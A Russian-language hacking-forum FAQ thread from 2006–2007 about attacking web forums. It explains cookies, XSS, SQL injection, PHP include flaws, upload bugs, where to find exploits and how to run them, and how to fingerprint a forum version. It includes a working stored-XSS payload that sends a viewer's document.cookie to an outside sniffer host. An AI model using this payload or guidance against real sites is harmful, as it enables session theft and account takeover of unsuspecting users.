PDA

Просмотр полной версии : [FAQ + полезные ссылки]


qBiN
24.04.2006, 19:34
Итак,вот он долгожданный FAQ,в состовлении принимали участие qBIN и AzazelЕсли у вас есть какие-либо добавления вопросы, прошу отправлять в личку нам,возможно они появится в FAQ
Что такое cookie(куки\кукисы\"печенья" далее просто cookie)?
cookie - это переменная,хранящяяся на стороне клиента.
За более полной информацией можно обратится сюда (http://www.proxoft.com/CookieEditor.asp)
или сюда. (http://google.ru) Так же, будет полезно почитать литературу.
Чем(как) отредактировать сookie?
Ниже преведены ссылки на редакторы cookie для различных браузеров(Сокрашения :IE - Internet Explorer, FF - FireFox):
IE - http://www.proxoft.com/CookieEditor.asp
FF - https://addons.mozilla.org/firefox/573/
Opera - Встроенный редактор
Какие виды уязвимостей встречаются в форумах и что они из себя представляют?
Мы перечислим основные из них:
1)xss(активные и пассивные)
Уязвимости класса xss в сущности сводятся к тому, что пользователь может внедрить в страницу произвольный
html-код. Это может случиться если фильтрация вводимых символов организованна некорректно(или её вопще нет).
Часто подобные аттаки организуются через любые поля ввода.Эти уязвимости делятся на две подкатегории: активный xss и пассивный xss.
Ативный xss-исполнение html кода, без "активных" действий пользователя. На примере форума: плохой программист не позаботился о фильтрации html тегов,
тогда злой дядька пишет сообщение
"Привет, какой классный у вас форум <script>img = new Image(); img.src = "http://antichat.ru/cgi-bin/s.jpg?"+document.cookie;</script>"
в результате просмотра этого сообщения пользователем его cookie "уплывут" на "сниффер".
Перейдём к пассивному XSS. Отличается от активного он тем, что для успешного проведения атаки пользователь должен пройти по специально составленной, предложенной ему ссылке, ведущей куда-либо на том же сайте откуда мы хотим увести куки. Обычно для такой атаки используются адресная строка браузера,поле search(работающее методом get),либо фрейм.
Больше информации о xss:
http://www.antichat.ru/crackchat/HTML/
http://ha.ckers.org/xss.html
http://google.ru
Решение:
http://debug-mode.in/tmp.txt
2)sql-inj
Уязвимость присутствует лишь в веб-приложениях работающих с бд.Если работа скрипта(фильтрация) организованна некорректно, мы можем модернизировать этот запрос таким образом, что он прихватит с собой из базы не только содержимое топика из таблицы topics, но и например значение поля password из таблицы users.
Не вижу смысла подробнее описывать sql-инъекции, т.к. это довольно обьёмная тема по которой существует очень много статей.
Cтатьи:
http://forum.antichat.ru/thread12132.html
http://zaco.jino-net.ru/index.php?file=view&news_id=15
http://www.infocity.kiev.ua/db/content/db263.phtml
http://www.abc-it.lv/index.php/id/715
3)php-inj
Один из самых опасных видов уязвимостей, позволяющий выполнять системные комманды на сервере.Успех проведения аттаки зависит от конфигурации сервера, ну и конечно от наличия самой уязвимости.Уязвимость заключается в некоректной проверки или её отсутствия переменных. предположим что переменная page используется в функции include , тогда возможно подключить удаленный скрипт и выполнить его.
4)Различные ошибки
Сюда я бы включил ошибки программистов.Например если веб-программист не реализовал проверку на расширение закачиваемых аватарок(Мы имеем в виду форумы,из-за спецификации раздела) тогда возможно загрузить скрипт,выполняющий комманды.
Что такое exploit(sploit,сплойт,експлоит,эк плоит) ?
exploit - программа, эксплотирующая уязвимость.
Где найти exploit под определенный продукт?
http://seclab.ru
http://milw0rm.com
http://google.ru
Как использовать(запустить)exploi t?
https://forum.antichat.ru/thread26510.html
Обычно эксплойты пишут на perl,php реже C и C++
Все зависит от языка:
Perl. Об использовании perl нам говорит как правило первая строчка в эксплойте #!/usr/bin/perl
Для использования эксплойтов на Perl нам необходим интерпретатор языка.Если у вас unix-like система,то скорее всего perl присутствует в дистрьюбитиве.Под Windows интерпретатор скачать можно тут http://www.activestate.com/Products/ActivePerl/?mp=1
php. "<?php" или "<?" говорит нам о том, что эксплойт написан на Php. Для эксплуатации так же необходим интерпретатор. Достать его можно на офицальном сайте http://php.net/ , но самое простое - установить Дэнвер http://www.denwer.ru/
C \ C++ Тут потребуется компилятор,какой использовать для компиляции можно уточнить у создателя сплойта,чаще указывают в коментариях на чем компилировать.
И все же как использовать exploit?Все зависит от самой уязвимости,часто создатели сплойта пишут параметры принимаемые эксплойтом.Если их нет,обратитесь к создателю.
Почему не работает этот эксплоит?
Часто создатели exploit'ов намеренно добавляют в них ошибки, для того что бы ими не пользовались незнающие люди.Так же возможно что "цель" пропатчена.


*************Внимание - Внимание*****************
Уважаемые пользователи, стыд да срам. Впредь флуд в этой теме, а также в подобных темах, будет строго наказываться. Это первое и последнее предупреждение.
*************Внимание - Внимание*****************

*************Attention - Attention*****************
Dear users, shame on you. Flood in this and similar themes will be strictly punished from now. It is last warning
*************Attention - Attention*****************

Grey
02.03.2007, 19:32
Полезные ссылки:


Ссылки на Эксплоиты (http://forum.antichat.ru/showthread.php?t=29658)
- Многие для взлома форумов.
- Милворм.
- Другие Эксплоиты.

-----------------------------------------------------

Как узнать версию форума?

1. Посмотреть исходный код страницы - как правило там можно найти не мало полезной информации (в Опере: Вид - Исходный текст; в ИЕ: Вид - Просмотр HTML-кода).
2. Попробывать "исследовать" форум, т.е. опередлить версию форума по наличию папок (или файлов), которые должны быть в какой то определённой версии форума.